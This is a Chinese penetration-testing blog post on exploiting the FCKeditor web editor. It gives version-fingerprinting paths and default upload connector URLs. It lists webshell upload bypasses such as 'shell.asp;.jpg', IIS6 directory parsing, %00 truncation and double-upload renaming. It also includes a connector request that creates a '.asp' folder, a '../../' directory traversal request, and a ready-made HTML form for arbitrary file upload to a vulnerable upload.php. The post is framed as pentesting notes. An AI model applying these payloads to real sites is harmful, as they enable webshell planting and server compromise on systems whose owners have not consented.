Fck编辑器漏洞

本来想写下Fck漏洞总结的, 写着写着就感觉不好组织语言了,其实这个漏洞存在的时间很久了,不过有时候在渗透测试项F目中,偶尔还是会遇到的,我就大概写一下吧,具体的大家可以查看我上传的资料,那里面讲的很仔细。

0x01.查看编辑器版本

/fckeditor/editor/dialog/fck_about.html

/FCKeditor/_whatsnew.html

0x02.寻找上传页面,其中默认的上传页面为

/FCKeditor/editor/filemanager/browser/default/browser.html?type=Image&connector=connectors/aspx/connector.aspx

在fck编辑器中,存在很多的上传页面,有些可以用,有些不可以用,这一步推荐大家使用扫描器配合下方的fck字典进行扫描查看具体的上传页面。

下载 “fck.txt” fck.txt – 已下载37次 – 57 KB

0x03.文件上传,并进行绕过

上传限制的突破方式很多,主要有:

抓包改扩展名(fck版本<=v2.4.3)

上传asa、cer、php2、php4、inc、pwml、pht后缀的文件

配合文件解析漏洞

shell.asp;.jpg

目录解析漏洞

/image/1.asp/1.jpg

文件%00截断

二次上传重命名绕过

其中FCK在上传了诸如shell.asp;.jpg的文件后,会自动将文件名改为shell_asp;.jpg。可以继续上传同名文件,文件名会变为shell.asp;(1).jpg

提交shell.php+空格绕过

空格只支持windows系统,linux系统是不支持的,可提交shell.php+空格来绕过文件名限制。

0x04.分语言类型讲解

1)asp

2.4.x 版本的File参数时为黑名单验证,可以通过上传.asa、.cer、.asp;jpg(针对IIS6)。如果asa、cer不被解析,还可以传.asp[空格]。传的方法就是抓包然后在数据包里的文件名后填个空格。
对于 2.5.x 和 2.6.x 版本,如果是IIS6.0 ,可以通过突破变”.”为”_”限制创建.asp文件夹,代码如下:

Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp

复制代码然后往这个文件夹里传 jpg ,这个不多说了。

如果是IIS7及以上,这种方法就gg了。这个时候可以借助刚爆出来的那种方法,先传shell.asp%00txt,然后再传一次。

asp版本已经全秒了。

2)aspx

低版本同ASP版,2.6.x用刚爆出来的二次上传已经不好使了,不过新建test.asp的文件夹还可以使。一般IIS6.0会支持asp,可以先传个asp上去,然后再XX。

3)php

1)低版本(2.4.x及以下),仍然为黑名单验证,windows主机可以使用php[空格]传,2.4.3的有个media未设置导致任意文件上传可以秒linux。

2)2.5.x以后是白名单验证,仅能寄希望于wooyun里爆的那个<2.6.4的任意文件上传,成功率有限。

3)2.6.4以上的php版,没戏。

4)当FCK版本 <=2.4.2的php网页在处理PHP 上传的地方并未对Media 类型进行上传文件类型的控制,导致用户上传任意文件!将以下保存为html文件,修改action地址为存在漏洞网页的链接。


<form id="frmUpload" enctype="multipart/form-data" action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">
Upload a new file:
<input type="file" name="NewFile" size="50″>
<input id="btnUpload" type="submit" value="Upload">
</form>

高版本存在 低版本不存在

0x05.补充点

有些站点fck漏洞还存在目录遍历漏洞
/FCKeditor/editor/filemanager/browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=../../

遍历E盘目录
Fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=File&CurrentFolder=/shell.asp&NewFolderName=z.asp

有时候,网站管理员会把上传页面禁止创建文件夹和上传文件,但是由于网站管理员的配置不当,我们的连接器写绝对路径的话,有时候可以创建文件夹和上传文件。

 

PS:注册会员可进入知识星球获取下载【Fck编辑器漏洞】所有参考资料。

参考:https://www.cnblogs.com/csnd/p/11807693.html

为您推荐

发表评论

电子邮件地址不会被公开。 必填项已用*标注